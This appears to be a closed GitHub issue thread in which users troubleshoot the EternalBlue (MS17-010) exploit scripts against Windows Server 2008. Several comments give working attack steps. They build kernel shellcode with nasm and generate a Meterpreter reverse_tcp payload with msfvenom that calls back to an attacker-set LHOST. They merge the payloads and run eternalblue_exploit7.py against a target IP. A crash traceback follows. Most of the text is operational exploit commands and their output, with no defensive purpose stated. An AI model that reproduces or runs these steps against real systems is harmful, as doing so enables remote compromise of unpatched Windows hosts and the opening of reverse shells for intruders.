Closed benichmt1 closed 7 years ago
I can confirm this is an issue. https://i.pitterapp.com/aJS0WbOpi.PNG
I have successfully exploited Windows Server 2008 R1 x64 doing the following:
nasm -f bin eternalblue_kshellcode_x64.asm
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=<LOCAL_IP> LPORT=4444
cat eternalblue_kshellcode_x64 meterpreter_msf.bin > sc_x64.bin
python eternalblue_exploit7.py <TARGET_IP> shellcode/sc_x64.bin
I did not use the eternalblue_merge_shellcode.py, which I wouldn't recommend using if you know the architecture of the target.
I can confirm @vivami's steps work:
However, it is incredibly unreliable and results in the following crash 80% of the time:
The other type of crash experienced happens occasionally when exiting the Meterpreter session:
@RickTorresJr yes, it is true. I have the same issue as you.
The error about Windows restarting in one minute is caused by lsass.exe crashing. It crashes because of bad userland shellcode.
So this issue is that you guys did not use the exploit correctly.
Hi, how can I resolve this problem?
Reproduction steps:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444
...
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445 ...
Run eternalblue_merge_shellcode.py
./eternalblue_merge_shellcode.py sc_x86_msf.bin sc_x64_msf.bin sc_out.bin
Run
python eternalblue_exploit7.py IP /opt/MS17-010/shellcode/sc_all.bin
Begins connection then fails. Machine crashes.
shellcode size: 874
numGroomConn: 13
Target OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
Traceback (most recent call last):
  File "eternalblue_exploit7.py", line 582, in
    exploit(TARGET, sc, numGroomConn)
  File "eternalblue_exploit7.py", line 544, in exploit
    recvPkt = conn.recvSMB()
  File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
    r = self._sess.recv_packet(self.__timeout)
  File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
    data = self.read(timeout)
  File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in read
    data = self.read_function(4, timeout)
  File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
    raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.